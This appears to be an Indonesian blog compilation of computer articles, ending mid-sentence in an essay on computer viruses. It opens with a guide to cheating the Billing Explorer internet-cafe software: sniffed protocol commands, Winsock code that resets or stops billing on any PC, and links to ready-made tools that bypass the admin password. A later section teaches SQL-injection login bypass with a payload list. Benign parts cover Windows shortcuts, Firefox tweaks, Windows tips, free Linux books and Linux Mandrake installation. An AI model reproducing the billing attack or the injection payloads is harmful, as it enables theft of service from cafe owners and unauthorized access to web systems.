Tehnik Menembus Billing Explorer

Untuk mencoba artikel ini, anda bisa mendownload program billing explorer demo di situ

Code:

http://www.billingexplorer.com

- Server Side
- Client Side

Saya asumsikan bahwa anda sudah mendowload dan menginstall di lokal komputer.
Kali ini kita coba dilokal terlebih dahulu, sebelum kita pergi ke warnet untuk melakukan percobaan artikel ini

Pengiriman data dari Client keserver biasanya diawali dengan kata kunci:

XX2

sedangkan pengiriman data dari Server ke client selalu diawali dengan kata kunci :

YA6

Nah pasti diantara pembaca bertanya2, gimana caranya mendapatkan nilai2 tersebut?..bingung kan?….sebetulnya sih gampang aja, kita gunakan program paket sniffer untuk melihat paket data yang masuk dan paket data yang keluar.
kalo mau coba-coba bisa menggunakan program ‘ether detect packet sniffer’ di www.etherdetect.com

ok, kita balik lagi ke pembahasan kita…..
ada beberapa perintah yang dikirim oleh client ke server, seperti:

Client Command
——————
$ablock$
$ablock2$
$act$
$ajblock$
$cekc$
$cektime$
$con$
$con1$
$con1dis$
$data$
$dina2$
$gpass$
$group$
$hblock$
$infod_0$
$infod_1$
$infod2$
$infod3$
$infod32$
$infod4$
$infouser$
$member$
$movecek$
$okmove2$
$paket$
$passA$
$pelajar$
$personal$
$rental$
$ruser$
$ruserh$
$send$
$sendcc$
$okmove1$
$tutup$

perintah-perintah tersebut saya dapatkan berdasarkan hasil decompiler program dengan menggunakan software vbLite & W32Dasm.Setelah kita mengetahui beberapa perintah diatas, kita bisa mencoba langsung dengan menggunakan perintah-perintah tersebut.kita gunakan komponen winsock untuk melakukan koneksi ke server, biasanya program B-Exp menggunakan port 1500 (default)
jadi kita bisa menuliskan syntax berikut:

Winsock1.Connect “192.168.0.1″,1500

artinya kita akan melakukan koneksi ke 192.168.0.1 dengan port 1500.
setelah anda berhasil terhubung keserver yang anda harus lakukan adalah mengirim inisialisasi paket data, agar program tersebut menerima permintaan kita.
adapun data yang dikirim adalah:

XX2$dina2$$$

diisi dengan pc yang akan kita gunakan sebagai inisialisasi koneksi.
contoh:

Winsock1.sendData “XX2$dina2$1$budak baonk$”

(artinya: kita melakukan koneksi sebagai komputer no 1 dengan nama budak baonk)
kalo pengiriman data berhasil, maka program B-Exp server akan mengirimkan data
“YA6$/connn$” yang artinya kita sudah terkoneksi ke billing dan program billing sudah siap menerima perintah2 yang dilakukan oleh program client.

Selanjutnya untuk memulai perhitungan billing kita bisa menggunakan dengan perintah:

XX2$con$2

Winsock1.SendData “XX2$con$1″

Perintah diatas juga bisa digunakan untuk mereset durasi/lama penggunaan billing.
jadi kalo anda udah pake selama 10 jam bisa balik lagi ke 0 jam dengan perintah tersebut

Nah selanjutnya untuk memberhentikan penggunaan billing kita bisa lakukan dengan mengirim perintah: XX2$web2$1$Hacker

Winsock1.SenData “XX2$web2$1$xxx”

perintah diatas bertujuan untuk menghentikan penghitungan billing pada no Pc 1 dengan nama budak baong. jadi kita bisa menghentikan selain pc yg kita pake, dengan merubah no pc.

gampang kan, so….kalian bisa coba-coba dengan perintah-perintah lainnya…kalo masih tetep bingung cara bikin programnya….hmm.mm…..jangan khawatir aku dah bikin programnya, jadi tinggal pake aja coy…

Download Sock B-Exp flooder :

Code:

http://www.vbbego.com/files/billEX.rar

—-

Cara Kedua

Untuk artikel selanjutnya penulis akan mencoba kembali memperlihatkan bagaimana
menggunakan Billing Explorer Client dengan login Admin.

Biasanya untuk login dengn jenis admin perhitungan billing otomatis tidak
berjalan (disable) untuk memulainya anda harus mendownload terlebih dahulu tool
yang sudah dibuat:

Download hack-Bexp :

Code:

http://www.vbbego.com/files/hackbillEX.rar

Setelah selesai download toolsnya, kita bisa langsung mencobanya.
ada beberapa langkah yang harus anda ikuti:

Anda login terlebih dahulu ke program billing spt biasa, dengan memilih jenis personal dengan nama login “xxx”

Setelah login maka secara otomatis program billing akan bekerja seperti biasa untuk menghitung lama penggunaan internet. Selanjutnya kita bisa jalankan tools yang tadi kita download untuk memulai melihat-lihat ada apa dibalik program B-Exp (billing explorer).

Secara otomatis program akan mencari apakah program billing berjalan di komputer atau tidak, dengan mencari caption id “????A?|A?” , apabila tidak ada maka program akan langsung keluar dan proses akan berhenti.

Apabila program billing ditemukan maka, program tersebut akan merubah parrent dari program billing explorer ke program “Hack B-Exp”

program billing sekarang sudah terperangkap didalam “hack b-exp” selain itu anda bisa lihat daftar HWND ID yang terdapat pada listbox, dimana kita bisa menampilkan objek-objek yang tersembunyi.

Biasanya kalo kita mengklik tombol Admin maka program Billing menyuruh kita memasukan password, tapi jangan khawatir…itu sangat mudah untuk dilewati.
ada yg tau gimana caranya……..pasti belum donk….

nah untuk masuk ke menu setting admin yang perlu kita lakukan adalah mencari kata #root:Administrator pada daftar handle windows.

ya kalo udah gini terserah anda, mau login gratis tinggal klik tombol Login, atau merubah setting lainnya ya bebas aja. Jadi silahkan coba klik item-item yang ada pada daftar handle window dan lihat apa yang tersembunyi di program billing tersebut.

Ternyata tidak sulit juga kan, kenapa demikian……he…he… semua ini
disebabkan pembutan setting dan login digabungkan dalam satu form dengan hanya memainkan properti VISIBLE…dan ini membuat mudah untuk ditampilkan kembali.

Shortcut yang Tersembunyi di Windows

Ctrl + Shift + Esc : task manager
Num Lock + * : open all sub-folder in windows explorer
Backspace : back
Shift + F10 : menu properties
Shift + Tab : up one level
F1 : help
F2 : rename
F3 : find universal
F4 : move to address bar
F5 : refresh
F6 : move to address bar & windows
Alt + F4 : close window universal
Alt + Enter : full screen & right click, properties
Alt + Space : menu
Alt + Tab : change display – easier
Alt + Esc : change display – harder
Windows key + D : minimize & maximize window
Windows key + E : windows explorer
Windows key + F : find universal
Windows key + L : lock windows
Windows key + M : minimize all windows
Windows key + R : run
Windows key + U : utility manager
Windows key + Pause/Break : system properties
Ctrl + A : select All
Ctrl + C : copy
Ctrl + D : delete
Ctrl + E : find in window
Ctrl + F : find universal
Ctrl + H : history
Ctrl + I : favorite
Ctrl + R : refresh
Ctrl + S : save
Ctrl + V : paste
Ctrl + W : close window
Ctrl + X : cut
Ctrl + Z : undo
Ctrl + Esc : start menu

Shortcut yang di ketik di run
- access.cpl = accessibility options
- appwiz.cpl = add or remove programs
- desk.cpl = display properties
- firewall.cpl = windows firewall
- hdwwiz.cpl = add hardware wizard
- ImageDrive.cpl = nero image drive
- inetcpl.cpl = internet properties
- intl.cpl = regional and language options
- joy.cpl = game controllers
- main.cpl = mouse properties
- mmsys.cpl = sounds and audio devices poperties
- ncpa.cpl = network connections
- netsetup.cpl = network setup wizard
- nusrmgr.cpl = user accounts
- odbccp32.cpl = odbc data source administrator
- powercfg.cpl = power options properties
- QuickTime.cpl = quick time settings
- sysdm.cpl = system properties
- telephon.cpl = location information
- timedate.cpl = date and time properties
- tweakmanager.cpl = winguides tweak manager
- wscui.cpl = windows security center
- wuaucpl.cpl = automatic updates
- S32LUCP1.CPL = liveupdate configuration
- Adobe Gamma.cpl = adobe gamma
- sapi.cpl = speech properties
- MLCFG32.CPL = mail
- sqlslic.cpl = choose licensing mode

system properties pake windows+pause/break

Teknik Mempercepat Browsing Di Internet

1. Ketik about:config di firefox anda kemudian enter
2. Maka akan keluar sebuah settingan untuk tweaking firefox
3. Untuk merubahnya, klik 2 kali dan masukkan data perubahannya
4. Jika data dibawah tidak terdapat dalam settingan default firefox, klik kanan pilih New. Untuk data berupa angka, pilih Integer, untuk true/false pilih Boolean.

- Untuk pengguna DSL :

1. Set network.http.pipelining : true
2. Set network.http.proxy.pipelining : true
3. Set network.http.pipelining.maxrequests : 64
4. Set “ngelayout.initialpaint.delay : 0″, apabila belum ada silahkan klik kanan, new>integer>nglayaut.initialpaint.delay
5. Set”trim_on_minimize : true”, apabila belum ada silahkan klik kanan, new>boolean>trim_on_minimize (lebih efektif pada Windows)

- Untuk pengguna ADSL :

1. Set network.http.max-connections : 64
2. Set network.http.max-connections-per-server : 21
3. Set network.http.max-persistent-connections-per-server : 8
4. Set network.http.pipelining : true
5. Set network.http.pipelining.maxrequests : 100
6. Set network.http.proxy.pipelining : true
7. Set nglayout.initialpaint.delay : 0

- Untuk pengguna Dial Up

1. Set browser.cache.disk_cache_ssl : true
2. Set browser.xul.error_pages.enabled : true
3. Set network.http.max-connections : 64
4. Set network.http.max-connections-per-server : 16
5. Set network.http.max-persistent-connections-per-proxy : 8
6. Set network.http.max-persistent-connections-per-server : 8
7. Set network.http.pipelining : true
8. Set network.http.pipelining.maxrequests : 8
9. Set network.http.proxy.pipelining : true
10. Set plugin.expose_full_path : true
11. Set signed.applets.codebase_principal_support : true
12. Set content.interrupt.parsing : true
13. Set content.max.tokenizing.time : 3000000
14. Set content.maxtextrun : 8191
15. Set content.notify.backoffcount : 5³
16. Set content.notify.interval : 750000
17. Set content.notify.ontimer : true

Set content.switch.threshold : 750000

Tips dan Trik Windows

Instalasi Windows yang Mudah dan Menyenangkan

01. Back-up dahulu registry sebelum diedit. Caranya, klik Start|Run, ketik regedit. Setelah muncul window registry, pilih menu File|Export. Pada bagian Export range, pilih All dan tentukan nama file, akhiri dengan klik tombol Save.
02. Banyak program yang sebenarnya terinstalasi dalam Windows, namun tidak aktif. Untuk mengaktifkannya, masuk ke Control Panel|Add/Remove Windows Component dan beri tanda centang pada program yang belum aktif.
03. Sebelum menginstalasi program baru atau melakukan perubahan setting Windows secara keseluruhan, lebih baik buat Restore Point secara manual dahulu. Caranya, Klik Start|All Programs|Accessories|System Tool|System Restore dan klik Create a restore point.
04. Jika Anda memutuskan untuk menginstalasi Windows Update yang sebelumnya sudah didecline, masuk ke Control Panel|System, pilih tab Automatic Updates dan klik Restore Declined Updates.
05. Untuk mengatur Windows update berjalan sesuai dengan kebutuhan Anda, atur dulu Windows Update. Caranya, buka System di Control Panel dan klik tab Automatic Updates. Atur enable atau disable option Keep my computer up to date.
06. Bila Anda tidak memiliki CD bootable, jangan khawatir. Microsoft sudah menyediakan tool gratis untuk membuat disket booting di http://support.microsoft.com/?kbid=310994.
07. Jika saat instalasi Windows tiba-tiba terhenti, matikan komputer dan lepas card tambahan. Misalnya sound card. Instal ulang dan pasang kembali card setelah instalasi selesai.
08. Untuk menambahkan System Administration Tools ada Start Menu, klik kanan Start|Properties. Masuk dalam tab Start Menu dan klik Customize kemudian masuk dalam tab Advanced. Geser ke bawah dan beri tanda centang pada option Display on the All Programs and the Start Menu.
09. Untuk menginstal Back up Utility pada Windows XP Home Edition carilah file ntbackup.msi di direktori\valudeadd\msft\ntbackup\ di CD instalasi Windows XP. Jalankan file tersebut dan ikuti langkahlangkahnya.
10. Windows XP secara otomatis akan me-highlight setiap program baru yang ter-install. Cara menghilangkannya, klik kanan Start|Properties. Masuk ke tab Start Menu|Customize, kemudian klik tab Advanced dan hilangkan tanda centang pada opsi Highlight newly installed program.
11. Untuk tampilan film atau game terbaik pada komputer, pastikan bahwa DirextX terbaru sudah terinstalasi dengan baik. Lihat versi terbarunya di www.microsoft.com/windows/directx.
12. Ada kalanya hardware yang akan dipasang belum support Plug-and-Play. Untuk itu, gunakan Add Hardware Wizard yang ada di Control Panel|System|Hardware untuk mendeteksinya.
TOP TIPS ! Mempercepat Kerja Komputer

13. Sebenarnya hanya dibutuhkan waktu tidak lebih dari 2 menit saja untuk masuk ke Windows sejak komputer dihidupkan. Namun, kadang terasa sangat lama. Untuk mempercepat loading Windows, ada beberapa hal yang bisa dilakukan. Misalnya, mengurangi icon di desktop serta tidak menggunakan wallpaper yang memakan banyak memory. Ganti wallpaper dengan background berwarna, serta gunakan Desktop Cleanup
Wizard yang ada bisa ditemui dengan klik kanan pada desktop untuk membersihkan icon. Jangan lupa juga, jalankan defrag secara berkala.
Jika Anda sering menambah atau mengurangi program di komputer, bersihkan registry secara rutin. Gunakan software bantu seperti Registry Mechanic dari situs www.winguides.com. Sayangnya, versi trial program ini hanya bisa digunakan memperbaiki sebanyak 6 sections saja.
Langkah lain yang perlu dilakukan adalah me-remove program yang di-load secara otomatis saat memulai Windows. Tentu saja, hanya program-program yang tidak dibutuhkan. Caranya, dengan menghapus semua isi folder startup dan membuka msconfig melalui Start|Run.
14. Gunakan fitur File and Transfer Setting Wizard untuk memindahkan file dan setting ke komputer baru. Caranya, klik Start|AllPrograms|Accessories|System Tools, kemudian jalankan File and Transfer Setting Wizard.
15. Gunakan pengecualian pada security setting di Internet Explorer, agar proses update melalui halaman Windows Update berjalan lancar. Caranya, buka Internet Option di menu Tools pada Internet Explorer. Klik tab Security, pilih Trusted Site dan klik tombol Sites. Isikan nama situs Windows Update, hilangkan tanda centang pada option Require server verification… dan klik OK.
16. Jika Anda kehilangan serial number Windows XP, gunakan freeware Magical Jelly Bean Keyfinder dari http://www.magicaljellybean.com/keyfinder.shtml.
17. Jika nama yang teregister dalam Windows XP Anda tidak sesuai, perbaiki melalui registry. Caranya, buka registry dan pilih MY Computer. Klik menu Edit|Find dan ketik RegOwner. Jika sudah ditemukan, klik kanan, pilih Modify dan isikan nama yang sesuai. Perubahan ini bisa juga dilakukan di key RegCompany.
Peningkatan Performa Internet dan Jaringan
18. Untuk men-share sebuah folder di komputer Anda ke jaringan, klik kanan folder tersebut dan pilih Properties. Klik tab Sharing dan enable option Share this folder on the network. Beri nama dan klik OK.
19. Buat sebuah icon My Network Places di desktop dengan mengklik kanan area kosong di dekstop dan klik Properties. Pilih tab Desktop|Customize Desktop. Kemudian buka tab General dan enable option My Network Places.
20. Ada cara mudah mengirim pesan ke komputer lain di jaringan, yakni menggunakan Console Message. Buka Control Panel|AdministrativeTools|Computer Management|Action|All Task|Send Console Message. Ketik teks yang hendak dikirim, tambahkan nama komputer yang hendak dituju dan klik Send.
21. Untuk mengatur Internet Connection Firewall (ICF), buka Network Connection di Control Panel, klik kanan koneksi yang ada dan klik Properties. Buka tab Advanced dan enable option Protect my computer and network by limitting or preventing access to this computer from Internet.
22. Atur Internet Connection Firewall (ICF) untuk setiap koneksi yang ada. Baik dial-up maupun broadband. Jika komputer Anda merupakan bagian dari jaringan yang terhubung ke Internet, pasang ICF hanya di komputer server.
23. Untuk mengetahui alamat IP Anda, masuk dalam DOS dengan mengetikkan command di Run. Kemudian ketikkan ipconfig /all.

24. Jika Anda menerima pesan dari Internetmelalui Messenger, segera matikan. Caranya, masuk ke Contol Panel|Administrative Tools|Services, dan klik ganda Messenger kemudian Stop. Untuk mencegah supaya tidak terulang, atur supaya Messenger menjadi Disabled di bagian Startup.
25. Matikan Windows Messenger dengan melalui regedit. Buka HKEY_LOCAL_MACHINE\Software\Policies\Microsoft, kemudian pilih menu Edit|New|Key, dan beri nama Messenger. Kemudian buat key lagi dengan cara ini di dalam direktori Messenger dengan nama key-nya Client. Setelah itu, klik menu Edit|New|DWORD Value, dan beri nama Prevent-Run. Klik kanan value PreventRun, pilih Modify, isi angka 1 pada Value data, dan klik OK.
26. Untuk mengetahui informasi mengenai koneksi di komputer Anda, klik Start|All Programs|Accessories|System Tools|System Information. Pilih menu Tools|Net Diagnostics. Pada window yang terbuka kemudian pilih option Scan your system. Tunggu hingga proses selesai untuk melihat hasilnya.
27. Lindungi privasi dengan mencegah aplikasi Windows Media Player mengirim data mengenai komputer dan kebiasaan Anda menggunakan komputer melalui Internet ke alamat-alamat tertentu. Caranya mudah, Pada Windows Media Player, pilih menu Tools|Option. Buka tab Player dan disable option Aloww internet sites to uniquely your player.
28. Untuk mengunci komputer yang berada dalam sebuah network domain, tekan tombol Ctrl + Alt + Del bersamaan dan klik option Lock Computer. Untuk membuka kembali, tekan tombol Ctrl + Alt + Deldan masukkan password. Konfigurasi Windows yang Mudah dan Cepat.
29. Untuk men-disable fitur autorun, klik kanan pada icon drive CD, pilih Properties dan masuk dalam tab AutoPlay. Kemudian disable autoplay untuk setiap jenis file yang tertera pada daftar.
30. Gunakan program Microsoft Clear Type Tuning Control dari http://www.microsoft.com/typography/cleartype/ untuk mengatur Clear Type pada komputer.

Buku Linux Gratisan

Informasi tentang berbagai teknik jaringan Internet merupakan komoditas yang sangat langka bagi sebagian besar masyarakat IT di Indonesia. Memang harus di akui bahwa pada hari ini karena akses ke Internet masih sangat sulit terutama di daerah, maka buku cetak maupun majalah masih merupakan alternatif solusi yang paling baik untuk penetrasi informasi & pengetahuan ke berbagai daerah. Karena ternyata informasi / pengetahuan yang berharga sekitar Rp. 12-15 ribu / buku ternyata masih di rasakan murah & cukup wajar lah bagi sebagian besar masyarakat Indonesia.

Akan tetapi bagi kita yang memiliki akses Internet, maka sebetulnya sebagian besar ilmu & pengetahuan tentang jaringan Internet dapat diperoleh secara cuma-cuma. Alhamdullillah, pada saat ini banyak rekan-rekan Open Source yang menyebarkan ilmu-nya secara gratis (cuma-cuma) di Internet. Sebagian dari buku tersebut dapat diperoleh juga di toko buku karena sebagian besar penulis Open Source tersebut juga meminta kepada penerbit untuk menerbitkannya dalam bentuk buku cetak untuk menembus masyarakat yang tidak memiliki akses yang terlalu baik ke Internet.

Umumnya buku-buku Open Source ini di tujukan untuk sistem operasi Linux. Format yang digunakan umumnya PDF yang bisa dibaca menggunakan Acrobat Reader yang bisa di ambil gratis di Internet juga. Linux sendiri adalah sistem operasi Open Source yang bisa di ambil gratisan di Internet. Kalaupun memperoleh copy-nya di Mangga Dua / di toko komputer biasanya membutuhkan biaya sekitar Rp. 20-30.000 / CD. Tidak ada pelanggaran hak cipta sama sekali untuk mengcopykan Linux sebanyak-banyaknya tanpa perlu takut di penjara.

Bagi rekan-rekan yang memiliki akses ke Internet akan membutuhkan waktu minimal sekitar 2-3 jam untuk mengambil buku-buku yang paling penting untuk mengerti tentang Linux ini. Ada beberapa tempat yang dapat saya usulkan untuk mengambil buku-buku tersebut. Tempat yang mungkin perlu di lihat paling awal adalah:

http://pandu.dhs.org

http://pandu.dhs.org/Buku-Online

http://www.linux.or.id

Terutama team PANDU yang di motori oleh I Made Wiryana harus di akui merupakan motor utama pergerakan Linux di Indonesia. Beberapa buku Linux termasuk tutorial Linux-nya yang sangat membantu dapat di ambil secara cuma-cuma tanpa melanggar HAKI. Buku-buku yang sifat tutorial sebagian merupakan bagian dari aktifitas Open Source Campus Agreement (OSCA) untuk membuka wawasan siswa / mahasiswa Indonesia akan Linux, seperti:

• Tutorial Pelatihan Administrasi Jaringan Linux oleh Andi, Afri & Wisesa.
• Tutorial Pelatihan Administrasi Sistem Linux oleh Andi, Afri & Wisesa.
• Tutorial Pelatihan Linux Dasar oleh Andi, Afri & Wisesa.
• SQL dengan Postgress oleh Owo Sugiana.
• GnuPlot untuk Orang Lugu oleh Abe Susanto & Wayan Wardana.
• Dan masih banyak lagi.

Bagi pembaca yang masih penasaran, saya sangat sarankan untuk memasuki situs Web dari berbagai aktifitas mendokumentasikan Linux, seperti

• Linus Documentation Project http://www.linuxdoc.org/guides.html
• Open Network Architecture http://www.openna.com
• The Open Source Writer Guild http://www.oswg.org:8080/oswg
• RedHat Linux Documentation http://www.redhat.com/linux_docs.html

Beberapa buku menarik yang bisa di download secara utuh dari Internet, antara lain adalah:

• Linux From Scratch oleh Gerard Beekmans
• Linux Installation Strategies oleh Tobby Banerjee (bagi yang ingin memasang Linux & Windows pada komputer yang sama).
• Linux Kernel Internals oleh Tigran Aivazian
• Securing and Optimizing Linux: RedHat Edition oleh Gerhard Mourani.
• The Linux Network Administrator’s Guide: Second Edition oleh Olaf Kirch & Terry Dawson (sekitar 500+ halaman)
• Linux Administrator’s Security Guide oleh Kurt Seifried.
• Linux Sistem Administration Made Easy oleh Steven Framton.
• The Linux System Administrator’s Guide oleh Lars Wirzenius & Joanna Oja
• Dan masih banyak sekali lainnya.

Rata-rata setiap buku lebih dari 200-an halaman & semua menjelaskan berbagai hal secara detail tentang Linux. Memang membutuhkan waktu lumayan untuk mengambil buku-buku ini, tapi dengan ketelatenan – kita bisa mengambil beberapa buku yang penting dalam waktu 2-3 jam-an. Sebaiknya pengambilan buku dilakukan pada pukul 4-6 pagi pada waktu seluruh Intenet di Indonesia masih lelap tertidur sehingga hubungan komunikasi masih sangat lancar.

Sumber:ono w.purbo

Inti Langkah Instalasi & Setting Linux Mandrake 8.0

Tulisan ini berusaha mendokumentasikan beberapa inti langkah yang perlu di perhatikan dalam menginstalasi & setting Linux Mandrake 8.0. Mengapa Linux Mandrake 8.0? karena Mandrake 8.0 ternyata paling mudah dioperasikan dibandingkan distribusi Linux lainnya & dapat membuat orang tergila-gila Linux.

Tujuan Tulisan

• Dibuat hanya point utama aja, agar mudah bagi orang untuk mengingat. Jadi memang bukan    berupa tulisan panjang lebar.

• Dapat digunakan untuk materi training Linux, mulai dari beginner s/d advanced.

Kebutuhan Alat / Material

• CD 1 Linux Mandrake (minimal)

• CD 2 Linux Mandrake (kalau ada lebih baik, bisa experimen lebih banyak)

• PC sebaiknya Pentium II 100Mhz ke atas.

• Memory sebaiknya 64Mbyte, bisa dipaksa di 32Mbyte tapi anda akan cukup sengsara.

• Harddisk minimal sekitar 2Gbyte (kalau hanya Linux), kalau ingin dual boot Linux & Windowz sebaiknya minimal sekitar 3Gbyte.

Pra-Instalasi Linux Mandrake

Tujuan:

• Boot dari CDROM.

Langkah:

• Siapkan BIOS agar booting dari CDROM.
• Jika BIOS di password, buat boot disk dari CD 1 Linux Mandrake. Gunakan /dosutils/rawrite.exe & write ke disket file /images/cdrom.img. Boot komputer menggunakan boot disket tsb.

Tujuan:

• Kosongkan partisi atau sisakan partisi untuk Linux (dengan filesystem ext2).

Langkah:

• Jika ingin semua harddisk untuk Linux. Biarkan harddisk apa adanya, kita akan mempartisi dari Linux.
• Jika anda ingin dualboot. Gunakan fdisk, partisi Windows secukupnya, kosongkan partisi untuk Linux, jangan di partisi sama sekali oleh fdisk. Install Windows selengkapnya sebelum install Linux.
• Jika anda ingin dualboot, tapi semua partisi sudah terisi Windows. Resize partisi menggunakan Partition Magic, sebelum install Linux.

Instalasi Linux Mandrake 8.0

Tujuan:

• Install Linux ke harddisk.

Langkah:

• Boot PC dengan CD 1 Mandrake di drive.
• Hampir semua pilihan tinggal di OK-kan.
• Kesalahan fatal yang sering dilakukan adalah men-set password root & melupakan password root tadi kekekekekek …..
• Pilih Instalasi Expert (supaya banyak software tambahan yang di install).
• Partisi minimal sekali / 1.5Gbyte, swap 64Mbyte, sisanya untuk /home. Jika anda ingin menyelamatan data-data, ada baiknya dibuat partisi /var.
• Pilih software package yang sesuai selera. Pada saat pemilihan paket, jangan lupa install Gnomba (untuk network neighbourhood).
• Setting Network – biasanya minimal sekali dial-up networking (kalau PC anda stand alone).
• Setting Video – paling aman memilih monitor: Non-interlaced SVGA, 1024×768 at 60Hz, 800×600 at 72Hz kalau anda tidak yakin tentang monitor anda.

SQL Injection

Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan port p ort yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tool .ke situs tersebut yang konon system yang seharga 152 milyar itu keamanannya berlapis lapis.

Dalam pembahasan ini hanya disebutkan basic atau dasar dasar dari teknik hacking yang dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang terproteksi sebagai siapa saja (anonymous) dengan hanya mengetahui username tanpa harus mengetahui passwordnya bahkan kita juga bisa login tanpa perlu mengetahui username dan password sama sekali SQL Injection merupakan teknik hacking yang memanfaatkan perintah SQL untuk memanipulasi script pada web korban sehingga script tersebut meloloskan perintah SQL yang simasukkan si penyerang.

Ilustrasi Kasus

Dalam ilustrasi kasus ini kita akan membuat web server sebagai korban. Web server ini dibangun menggunakan :

Apache

untuk membangun web server

PHP

sebagai bahasa pemrograman

MySQL untuk database server

Pada server, terdapat script PHP untuk

memeriksa login sebagai berikut :

$username = $_GET['username'];

$password = $_GET['password'];

$sql = mysql_query(“SELECT * FROM

login WHERE username=’$username’ &&

password=’$password’”);

Nah! Script inilah yang akan kita manfaatkan untuk melakukan SQL injection

Sebagai Login standart seharusnya user harus

memasukkan

username

: admin

password

: 123456

Namun sebagai user yang ‘nakal’ kita tidak perlu mengetahui username dan password tersebut untuk dapat masuk. Cukup kita manfaatkan script PHP yang telah disebutkan diatas Kita siap dengan “niat jahat” kita. Untuk mewujudkan niat tersebut kita cukup membuat query SQL ‘kebingungan’ sehingga meloloskan nilai true atau string kosong (‘ ‘) tanpa mengecek keberadaan akun user pada field username dan password pada tabel login.

Kita masukkan script ‘ OR ’s’=’s pada input username dan password.

username = ‘ OR ’s’=’s

password = ‘ OR ’s’=’s

Script yang kita masukkan tadi akan mengacaukan query:

$sql = mysql_query(“SELECT * FROM login

WHERE username=’$username’ &&

password=’$password’”);

sehingga perintah query menjadi :

$sql = mysql_query(“SELECT * FROM login

WHERE username=’‘ OR ’s’=’s‘ &&

password=’‘ OR ’s’=’s‘”);

ini artinya jika

username = ‘ ‘ atau username = true dan

password = ‘ ‘ atau password = true

maka user akan dapat login

Kemungkinan kemungkinan script lainya :

or 1=1″

or 1=1or

1=1′

or ‘a’='a

” or “a”=”a

‘) or (‘a’='a

‘ or 0=0 “

or 0=0 or

0=0 ‘

or 0=0 #

Virus Komputer

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan

jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang

terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai

virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan

memahami tentang virus.

A.ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan ” teori self altering automata ”

yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori

yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori

tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat

program yang dapat memperbanyak dirinya dan dapat menghancurkan program

buatan lawan.Program yang mampu bertahan dan menghancurkan semua program

lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya

menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka

pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang

diciptakan makin lama makin berbahaya, sehingga mereka melakukan

pengawasan dan pengamanan yang ketat.1980, program tersebut yang akhirnya dikenal dengan nama “virus” ini berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

B.PENGERTIAN VIRUS

” A program that can infect other programs by modifying them to include a slighty altered copy of itself.A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows “ ( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di

Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa

persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).

Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan “worm”. Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.

C.KRITERIA VIRUS

Suatu program yang disebut virus baru dapat dikatakan adalah benar benar

virus apabila minimal memiliki 5 kriteria :

1. Kemampuan suatu virus untuk mendapatkan informasi

2. Kemampuannya untuk memeriksa suatu program

3. Kemampuannya untuk menggandakan diri dan menularkan

4. Kemampuannya melakukan manipulasi

5. Kemampuannya untuk menyembunyikan diri.

Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap

-tiap kemampuan itu dan mengapa ini sangat diperlukan.

1.Kemampuan untuk mendapatkan informasi

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam

suatu directory, untuk apa? agar dia dapat mengenali program program apa

saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua

file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan

mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/

data semua file, terus memilahnya dengan mencari file-file yang bisa

ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi

atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan

pengumpulan data dan menaruhnya di RAM (biasanya ) , sehingga apabila

komputer dimatikan semua data hilang tetapi akan tercipta setiap program

bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

2.Kemampuan memeriksa suat program

Suatu virus juga harus bias untuk memeriksa suatu program yang akan

ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia

harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,

karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat

berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan

menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah

memiliki/ memberi tanda pada file/program yang telah terinfeksi

sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan

adalah misalnya memberikan suatu byte yang unik disetiap file yang

telah terinfeksi.

3.Kemampuan untuk menggandakan diri

Kalo ini emang virus “bang-get”, maksudnya tanpa ini tak adalah virus.

Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari

program lainnya. Suatu virus apabila telah menemukan calon korbannya

(baik file atau program) maka ia akan mengenalinya dengan memeriksanya,

jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari

dengan cara menuliskan byte pengenal pada program/ file tersebut,dan

seterusnya mengcopikan/menulis kode objek virus diatas file/program

yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk

menulari/ menggandakan dirinya adalah:

a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian

diciptakan suatu file menggunakan nama itu dengan menggunakan virus

